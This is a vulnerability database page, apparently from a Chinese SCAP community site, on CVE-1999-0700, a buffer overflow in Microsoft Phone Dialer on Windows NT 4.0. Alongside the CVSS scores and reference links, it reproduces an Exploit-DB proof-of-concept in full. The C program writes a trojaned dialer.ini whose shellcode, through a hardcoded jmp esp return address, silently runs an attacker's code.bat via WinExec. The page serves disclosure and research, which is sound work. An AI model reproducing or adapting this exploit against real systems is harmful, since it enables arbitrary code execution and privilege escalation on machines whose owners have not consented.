CVE-1999-0700
CVSS6.2
发布时间 :1999-07-29 00:00:00
修订时间 :2008-09-09 00:00:00
NMCOE    

[原文]Buffer overflow in Microsoft Phone Dialer (dialer.exe), via a malformed dialer entry in the dialer.ini file.


[CNNVD]Microsoft Phone Dialer (dialer.exe)缓冲区溢出漏洞(CNNVD-199907-035)

        Microsoft Phone Dialer (dialer.exe)存在缓冲区溢出漏洞。由dialer.ini文件中的错误拨号入口引起该漏洞。

- CVSS (基础分值)

CVSS分值: 6.2 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0:sp3Microsoft Windows 4.0 sp3
cpe:/o:microsoft:windows_nt:4.0:sp1Microsoft Windows 4.0 sp1
cpe:/o:microsoft:windows_nt:4.0:sp4Microsoft Windows 4.0 sp4
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2Microsoft Windows 4.0 sp2
cpe:/o:microsoft:windows_ntMicrosoft Windows NT

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0700
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0700
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms99-026.mspx
(UNKNOWN)  MS  MS99-026
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q237185
(UNKNOWN)  MSKB  Q237185

- 漏洞信息

Microsoft Phone Dialer (dialer.exe)缓冲区溢出漏洞
中危 缓冲区溢出
1999-07-29 00:00:00 2006-04-19 00:00:00
本地  
        Microsoft Phone Dialer (dialer.exe)存在缓冲区溢出漏洞。由dialer.ini文件中的错误拨号入口引起该漏洞。

- 公告与补丁

        

- 漏洞信息 (19440)

Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability (EDBID:19440)
windows local
1999-07-30 Verified
0 David Litchfield
N/A [点击下载]
source: http://www.securityfocus.com/bid/554/info

Dialer.exe has an unchecked buffer in the part of the program that reads dialer entries from %systemroot%\dialer.ini. A specially-formed entry could cause arbitrary code to be run on the machine. By default, the %systemroot% folder is world-writeable. Dialer.ini is Dialer runs in the security context of the user, so an attacker would have to have a higher authority user dial the entry to gain any escalated priveleges.

The following code will create a trojaned dialer.ini file that when read in by dialer will cause it to run a batch file called code.bat - this is hidden from the desktop by calling the equivalent of WinExec("code.bat",0); - and then ExitProcess(0); is called to shutup dialer.exe. Once the dialer.ini has been trojaned the attacker would create a batch file called code.bat and place in there any commands they wished to be run. Needless to say that if a user with admin rights runs dialer any commands placed in this batch file are likely to succeed. 

#include <stdio.h>
  #include <windows.h>

   int main(void)
{
    FILE *fd;
    char ExploitCode[256];
    int count = 0;
    while (count < 100)
      {
      ExploitCode[count]=0x90;
      count ++;
      }

    // ExploitCode[100] to ExploitCode[103] overwrites the real return address
    // with 0x77F327E5 which contains a "jmp esp" instruction taking us back
    // to our payload of exploit code
   ExploitCode[100]=0xE5;
   ExploitCode[101]=0x27;
   ExploitCode[102]=0xF3;
   ExploitCode[103]=0x77;

   // procedure prologue - push ebp
   // mov ebp,esp
   ExploitCode[104]=0x55;
   ExploitCode[105]=0x8B;

   // This moves into the eax register the address where WinExec() is found
   // in kernel32.dll at address 0x77F1A9DA - This address has been hard-
   // coded in to save room rather than going through LoadLibrary() and
   // GetProcAddress () to get the address - since we've already hard
   // coded in the return address from kernel32.dll - there seems no
   // harm in doing this
   ExploitCode[106]=0xEC;
   ExploitCode[107]=0xB8;
   ExploitCode[108]=0xDA;
   ExploitCode[109]=0xA9;
   ExploitCode[110]=0xF1;
   ExploitCode[111]=0x77;

   // We need some NULLs to terminate a string - to do this we xor the esi
   // register with itself - xor esi,esi
   ExploitCode[112]=0x33;
   ExploitCode[113]=0xF6;

   // These NULLs are then pushed onto the stack - push esi
   ExploitCode[114]=0x56;

   // Now the name of the batch file to be run is pushed onto the stack
   // We'll let WinExec() pick up the file - we use push here
   // to push on "tab." (code.bat)
   ExploitCode[115]=0x68;
   ExploitCode[116]=0x2E;
   ExploitCode[117]=0x62;
   ExploitCode[118]=0x61;
   ExploitCode[119]=0x74;

   // And now we push on "edoc"
   ExploitCode[120]=0x68;
   ExploitCode[121]=0x63;
   ExploitCode[122]=0x6F;
   ExploitCode[123]=0x64;
   ExploitCode[124]=0x65;

   // We push the esi (our NULLs) again - this will be used by WinExec() to
  determine
    // whether to display a window on the desktop or not - in this case it will
  not
   ExploitCode[125]=0x56;

  // The address of the "c" of code.bat is loaded into the edi register -
  this
    // becomes a pointer to the name of what we want to tell WinExec() to run
   ExploitCode[126]=0x8D;
   ExploitCode[127]=0x7D;
   ExploitCode[128]=0xF4;

   // This is then pushed onto the stack
   ExploitCode[129]=0x57;

   // With everything primed we then call WinExec() - this will then run
  code.bat
   ExploitCode[130]=0xFF;
   ExploitCode[131]=0xD0;

   // With the batch file running we then call ExitProcess () to stop
  dialer.exe
    // from churning out an Access Violation message - first the procedure
    //prologue push ebp and movebp,esp
   ExploitCode[132]=0x55;
   ExploitCode[133]=0x8B;
   ExploitCode[134]=0xEC;

   // We need to give ExitProcess() an exit code - we'll give it 0 to use - we
  need
    // some NULLs then - xor esi,esi
   ExploitCode[135]=0x33;
   ExploitCode[136]=0xF6;

   // and we need them on the stack - push esi
   ExploitCode[137]=0x56;

   // Now we mov the address for ExitProcess() into the EAX register - again
  we
    // we hard code this in tieing this exploit to NT 4.0 SP4
   ExploitCode[138]=0xB8;
   ExploitCode[139]=0xE6;
   ExploitCode[140]=0x9F;
   ExploitCode[141]=0xF1;
   ExploitCode[142]=0x77;

   // And then finally call it
   ExploitCode[143]=0xFF;
   ExploitCode[144]=0xD0;

   // Now to create the trojaned dialer.ini file
   fd = fopen("dialer.ini", "w+");
   if (fd == NULL)
     {
     printf("Couldn't create dialer.ini");
     return 0;
     }
   // Give dialer.exe what it needs from dialer.ini
   fprintf(fd,"[Preference]\nPreferred Line=148446\nPreferred Address=0\nMain
  Window  Left/Top=489, 173\n[Last dialed numbers]\nLast dialed 1=");

   // And inject our exploit code
   fprintf(fd,ExploitCode);

          fclose(fd);
}

		

- 漏洞信息

7405
Microsoft Phone Dialer (dialer.exe) Dialer Entry Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-07-29 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站